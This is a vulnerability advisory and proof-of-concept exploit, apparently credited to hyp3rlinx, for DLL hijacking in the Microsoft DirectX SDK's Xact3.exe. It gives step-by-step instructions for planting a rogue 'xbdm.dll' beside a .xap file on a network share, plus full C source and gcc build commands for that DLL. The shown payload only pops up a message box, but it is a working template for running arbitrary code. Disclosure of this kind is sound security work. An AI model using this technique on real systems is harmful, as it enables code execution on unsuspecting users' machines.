Microsoft DirectX SDK - Xact.exe Remote Code Execution Exploit

[+] Credits: John Page (aka hyp3rlinx)      
 
Vendor
=============
www.microsoft.com
 
 
Product
===========
Microsoft DirectX SDK (June 2010) Xact3.exe
https://www.microsoft.com/en-us/download/details.aspx?id=6812
 
XACT (Cross-platform audio creation tool) is an audio creation and authoring tool from Microsoft.
It comes with a graphical interface that allows sound designers to create audio resources for games,
that can be integrated into XNA projects, offering the game developer a convenient way of accessing these sounds.
 
 
Security Issue
================
Microsoft DirectX SDK "Xact3.exe" Cross-platform tool allows for arbitrary code execution via a Trojan horse file "xbdm.dll"
in the current working directory, upon opening a ".xap" project file from same location. 
The DirectX SDK deprecated but still avail for download at time of this writing ...
 
 
 
Exploit/POC
=============
1) create DLL 32bit DLL named "xbdm.dll" and place on a remote share
 
2) create an empty file with a ".xap" extension on the same share, this will open using "Xact3.exe" as its default
 
3) open the the .xap file from the Network share then BOOM!
 
 
#include <windows.h>
 
/* hyp3rlinx */
 
/*
gcc -c -m32 xbdm.c
gcc -shared -m32 -o xbdm.dll xbdm.o
*/
 
void executo(){
     MessageBox( 0, "3c184981367094fce3ab70efc3b44583" , "philbin " , MB_YESNO + MB_ICONQUESTION );
}
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
    switch(fdwReason){
        case DLL_PROCESS_ATTACH:{
             executo();
            break;
        }
        case DLL_PROCESS_DETACH:{
             executo();
            break;
        }
        case DLL_THREAD_ATTACH:{
             executo();
            break;
        }
        case DLL_THREAD_DETACH:{
             executo();
            break;
        }
    }
     
    return TRUE;
}


#  0day.today [2018-08-14]  #